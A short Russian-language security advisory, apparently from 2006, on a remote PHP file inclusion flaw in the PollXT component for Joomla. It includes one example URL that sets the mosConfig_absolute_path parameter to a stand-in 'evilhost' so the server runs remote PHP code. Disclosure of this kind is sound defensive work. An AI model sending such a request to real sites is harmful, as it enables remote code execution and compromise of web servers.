PHP-инклюдинг в Joomla PollXT

Дата публикации:
19.07.2006
Всего просмотров:
3705
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PollXT 1.x (компонент к Joomla)
Уязвимые версии: PollXT (компонент Joomla) 1.22.07, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии components/com_pollxt/conf.pollxt.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://victim/components/com_pollxt/conf.pollxt.php?mosConfig_absol
ute_path=http://evilhost

URL производителя: www.joomlaxt.com/index.php?option= com_remository&Itemid=77&func=fileinfo&id=9&lang=en

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: pollxt Mambo Component <= 1.22.07 Remote Include Vulnerability

или введите имя

CAPTCHA